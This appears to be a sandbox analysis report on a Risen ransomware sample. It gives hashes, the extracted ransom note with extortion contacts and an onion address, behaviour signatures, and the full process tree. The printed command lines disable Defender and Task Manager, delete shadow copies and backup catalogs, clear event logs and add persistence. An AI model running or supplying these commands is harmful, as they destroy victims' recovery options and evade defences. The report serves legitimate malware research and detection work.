Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    300s
  • max time network
    203s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15/05/2024, 15:52

General

  • Target

    risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe

  • Size

    149KB

  • MD5

    0444b3d690823924667302cfae1f0655

  • SHA1

    737d0d001e60ce20c8f35a2bbac0f4d525b96174

  • SHA256

    3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5

  • SHA512

    5dacf16ce60bb5191708de906a920ab63fa3d5458fc7331013d8c3997beae802f0ea4b318392b1c4c6e15417a15423661e6bb4cb072adb33338493b1aac2c57d

  • SSDEEP

    3072:wz5vBHTp2Obwai/tge32Vhh53u8rrsusAkeOe494flyntoGNout:wtvBlZc/tZ3yh53u8rg/AkFe4ufkntVZ

Malware Config

Extracted

Path

C:\ProgramData\$Risen_Guide.hta

Ransom Note
All Your Important Files Have Been Encrypted NOTE We have also taken your critical documents and files from different parts of your network, which we will leak or sell if there is no cooperation from your side. Our operators have been monitoring your business for a while, when we say these documents are critical, we mean it. We await for your response before the deadline ends, After that we will continue the process of leaking or selling your documents. We assure you that this won't happen if you cooperate with us. CONTACT US For more instructions, to save your files and your business, contact us by : Email address : [email protected] , TELEGRAM:@tokyosupp didn't get any response in 24 hours ? use : [email protected] Leave subject as your machine id " AAFJKAF8XA " If you didn't get any respond within 72 hours use our blog to contact us, therefore we can create another way for you to contact your cryptor as soon as possible. http://s2wk77h653qn54csf4gp52orhem4y72dgxsquxulf255pcymazeepbyd.onion/ ATTENTION Do not rename or change info of any file, in case of any changes in files after encryption there is a huge risk for making it unusable Do not pay any amount of money before receiving decrypted test files there might be many middle man services out there whom will contact us for your case and they will make a profit by adding a sort of money to the fixed price any attempts for decrypting your files through third party softwares will cause permanent damage to following files and permanent data loss there will be a deadline until your data get sold or leaked by our team,you better corporate with us before the following deadline otherwise we will proceed to sell or leak your data without any past warnings
URLs

http://s2wk77h653qn54csf4gp52orhem4y72dgxsquxulf255pcymazeepbyd.onion/

Signatures

  • Deletes NTFS Change Journal 2 TTPs 1 IoCs

    The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Clears Windows event logs 1 TTPs 5 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Renames multiple (3367) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Disables use of System Restore points 1 TTPs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 48 IoCs
  • Suspicious use of AdjustPrivilegeToken 27 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe
    "C:\Users\Admin\AppData\Local\Temp\risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe"
    1⤵
    • UAC bypass
    • Checks computer location settings
    • Checks whether UAC is enabled
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:112
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINESoftware\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4028
      • C:\Windows\system32\reg.exe
        reg add "HKEY_LOCAL_MACHINESoftware\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
        3⤵
          PID:4940
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3192
        • C:\Windows\system32\reg.exe
          reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
          3⤵
          • Modifies Windows Defender Real-time Protection settings
          PID:4516
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4840
        • C:\Windows\system32\reg.exe
          reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
          3⤵
            PID:2872
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1492
          • C:\Windows\system32\reg.exe
            reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
            3⤵
              PID:5048
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:5020
            • C:\Windows\system32\reg.exe
              reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
              3⤵
                PID:1044
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:408
              • C:\Windows\system32\reg.exe
                reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
                3⤵
                  PID:3956
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:2232
                • C:\Windows\system32\reg.exe
                  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
                  3⤵
                    PID:3084
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4460
                  • C:\Windows\system32\reg.exe
                    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
                    3⤵
                      PID:3008
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:5052
                    • C:\Windows\system32\reg.exe
                      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
                      3⤵
                        PID:3460
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:5096
                      • C:\Windows\system32\reg.exe
                        reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
                        3⤵
                          PID:4864
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2276
                        • C:\Windows\system32\reg.exe
                          reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
                          3⤵
                            PID:4488
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:728
                          • C:\Windows\system32\reg.exe
                            reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
                            3⤵
                              PID:2432
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:1712
                            • C:\Windows\system32\reg.exe
                              reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
                              3⤵
                                PID:764
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
                              2⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4064
                              • C:\Windows\system32\reg.exe
                                reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
                                3⤵
                                  PID:2972
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
                                2⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3820
                                • C:\Windows\system32\reg.exe
                                  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
                                  3⤵
                                    PID:3020
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
                                  2⤵
                                    PID:628
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
                                      3⤵
                                        PID:2240
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
                                      2⤵
                                        PID:4676
                                        • C:\Windows\system32\reg.exe
                                          reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
                                          3⤵
                                            PID:4508
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
                                          2⤵
                                            PID:4600
                                            • C:\Windows\system32\reg.exe
                                              reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
                                              3⤵
                                                PID:1672
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
                                              2⤵
                                                PID:4984
                                                • C:\Windows\system32\reg.exe
                                                  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
                                                  3⤵
                                                    PID:4208
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
                                                  2⤵
                                                    PID:948
                                                    • C:\Windows\system32\reg.exe
                                                      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
                                                      3⤵
                                                        PID:212
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
                                                      2⤵
                                                        PID:440
                                                        • C:\Windows\system32\reg.exe
                                                          reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
                                                          3⤵
                                                            PID:3756
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
                                                          2⤵
                                                            PID:1788
                                                            • C:\Windows\system32\reg.exe
                                                              reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
                                                              3⤵
                                                                PID:3032
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
                                                              2⤵
                                                                PID:2208
                                                                • C:\Windows\system32\reg.exe
                                                                  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
                                                                  3⤵
                                                                    PID:1536
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
                                                                  2⤵
                                                                    PID:1160
                                                                    • C:\Windows\system32\reg.exe
                                                                      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
                                                                      3⤵
                                                                        PID:3760
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "SystemDefense" /TR "C:\Users\Admin\AppData\Local\Temp\risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe" /F
                                                                      2⤵
                                                                        PID:3536
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "SystemDefense" /TR "C:\Users\Admin\AppData\Local\Temp\risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe" /F
                                                                          3⤵
                                                                          • Creates scheduled task(s)
                                                                          PID:1448
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\
                                                                        2⤵
                                                                          PID:7544
                                                                          • C:\Windows\system32\fsutil.exe
                                                                            fsutil usn deletejournal /D F:\
                                                                            3⤵
                                                                            • Enumerates connected drives
                                                                            PID:7652
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\
                                                                          2⤵
                                                                            PID:8256
                                                                            • C:\Windows\system32\fsutil.exe
                                                                              fsutil usn deletejournal /D C:\
                                                                              3⤵
                                                                                PID:7968
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\
                                                                              2⤵
                                                                                PID:8132
                                                                                • C:\Windows\system32\fsutil.exe
                                                                                  fsutil usn deletejournal /D M:\
                                                                                  3⤵
                                                                                  • Enumerates connected drives
                                                                                  PID:9108
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup
                                                                                2⤵
                                                                                  PID:7496
                                                                                  • C:\Windows\system32\wevtutil.exe
                                                                                    wevtutil.exe cl Setup
                                                                                    3⤵
                                                                                    • Clears Windows event logs
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:6968
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System
                                                                                  2⤵
                                                                                    PID:8112
                                                                                    • C:\Windows\system32\wevtutil.exe
                                                                                      wevtutil.exe cl System
                                                                                      3⤵
                                                                                      • Clears Windows event logs
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:7852
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application
                                                                                    2⤵
                                                                                      PID:8068
                                                                                      • C:\Windows\system32\wevtutil.exe
                                                                                        wevtutil.exe cl Application
                                                                                        3⤵
                                                                                        • Clears Windows event logs
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:8664
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security
                                                                                      2⤵
                                                                                        PID:6528
                                                                                        • C:\Windows\system32\wevtutil.exe
                                                                                          wevtutil.exe cl Security
                                                                                          3⤵
                                                                                          • Clears Windows event logs
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:5700
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false
                                                                                        2⤵
                                                                                          PID:7568
                                                                                          • C:\Windows\system32\wevtutil.exe
                                                                                            wevtutil.exe cl Security /e:false
                                                                                            3⤵
                                                                                            • Clears Windows event logs
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:8104
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
                                                                                          2⤵
                                                                                            PID:6808
                                                                                            • C:\Windows\system32\vssadmin.exe
                                                                                              vssadmin.exe Delete Shadows /all /quiet
                                                                                              3⤵
                                                                                              • Interacts with shadow copies
                                                                                              PID:8016
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
                                                                                            2⤵
                                                                                              PID:628
                                                                                              • C:\Windows\system32\bcdedit.exe
                                                                                                bcdedit /set {default} recoveryenabled No
                                                                                                3⤵
                                                                                                • Modifies boot configuration data using bcdedit
                                                                                                PID:7924
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                                                                                              2⤵
                                                                                                PID:7996
                                                                                                • C:\Windows\system32\bcdedit.exe
                                                                                                  bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                                                                                                  3⤵
                                                                                                  • Modifies boot configuration data using bcdedit
                                                                                                  PID:8328
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
                                                                                                2⤵
                                                                                                  PID:6460
                                                                                                  • C:\Windows\system32\fsutil.exe
                                                                                                    fsutil.exe usn deletejournal /D C:
                                                                                                    3⤵
                                                                                                    • Deletes NTFS Change Journal
                                                                                                    PID:8312
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
                                                                                                  2⤵
                                                                                                    PID:8528
                                                                                                    • C:\Windows\system32\wbadmin.exe
                                                                                                      wbadmin.exe delete catalog -quiet
                                                                                                      3⤵
                                                                                                      • Deletes backup catalog
                                                                                                      PID:8660
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                                                                                                    2⤵
                                                                                                      PID:7868
                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                        schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                                                                                                        3⤵
                                                                                                          PID:7688
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "SystemDefense" /F
                                                                                                        2⤵
                                                                                                          PID:7732
                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                            SCHTASKS.exe /Delete /TN "SystemDefense" /F
                                                                                                            3⤵
                                                                                                              PID:7572
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
                                                                                                            2⤵
                                                                                                              PID:8036
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
                                                                                                                3⤵
                                                                                                                  PID:5680
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
                                                                                                                2⤵
                                                                                                                  PID:7668
                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
                                                                                                                    3⤵
                                                                                                                      PID:6672
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WELCOME " /f
                                                                                                                    2⤵
                                                                                                                      PID:8292
                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                        REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WELCOME " /f
                                                                                                                        3⤵
                                                                                                                          PID:2056
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " We have penetrated your whole network due some critical security issues. We have encrypted all files on each host in the network , We have also Took your critical data AND in case of NO corporation until the end of the deadline we WILL leak or sell your data, the only way to stop this process is successful corporation. ([email protected] , TELEGRAM:@tokyosupp) AND :([email protected]) " /f
                                                                                                                        2⤵
                                                                                                                          PID:7976
                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                            REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " We have penetrated your whole network due some critical security issues. We have encrypted all files on each host in the network , We have also Took your critical data AND in case of NO corporation until the end of the deadline we WILL leak or sell your data, the only way to stop this process is successful corporation. ([email protected] , TELEGRAM:@tokyosupp) AND :([email protected]) " /f
                                                                                                                            3⤵
                                                                                                                              PID:9008
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f
                                                                                                                            2⤵
                                                                                                                              PID:8228
                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                taskkill /IM mshta.exe /f
                                                                                                                                3⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:7608
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\$Risen_Note.txt
                                                                                                                              2⤵
                                                                                                                                PID:8224
                                                                                                                                • C:\Windows\system32\notepad.exe
                                                                                                                                  notepad.exe C:\ProgramData\$Risen_Note.txt
                                                                                                                                  3⤵
                                                                                                                                    PID:4960
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /c C:\ProgramData\$Risen_Guide.hta
                                                                                                                                  2⤵
                                                                                                                                  • Checks computer location settings
                                                                                                                                  • Modifies registry class
                                                                                                                                  PID:8416
                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                    "C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\$Risen_Guide.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                                                                                                    3⤵
                                                                                                                                      PID:3612
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 1408
                                                                                                                                        4⤵
                                                                                                                                        • Program crash
                                                                                                                                        PID:8756
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe"
                                                                                                                                    2⤵
                                                                                                                                      PID:8272
                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                        ping 127.0.0.1 -n 5
                                                                                                                                        3⤵
                                                                                                                                        • Runs ping.exe
                                                                                                                                        PID:5064
                                                                                                                                  • C:\Windows\system32\vssvc.exe
                                                                                                                                    C:\Windows\system32\vssvc.exe
                                                                                                                                    1⤵
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:4424
                                                                                                                                  • C:\Windows\system32\vssvc.exe
                                                                                                                                    C:\Windows\system32\vssvc.exe
                                                                                                                                    1⤵
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:8332
                                                                                                                                  • C:\Windows\system32\wbengine.exe
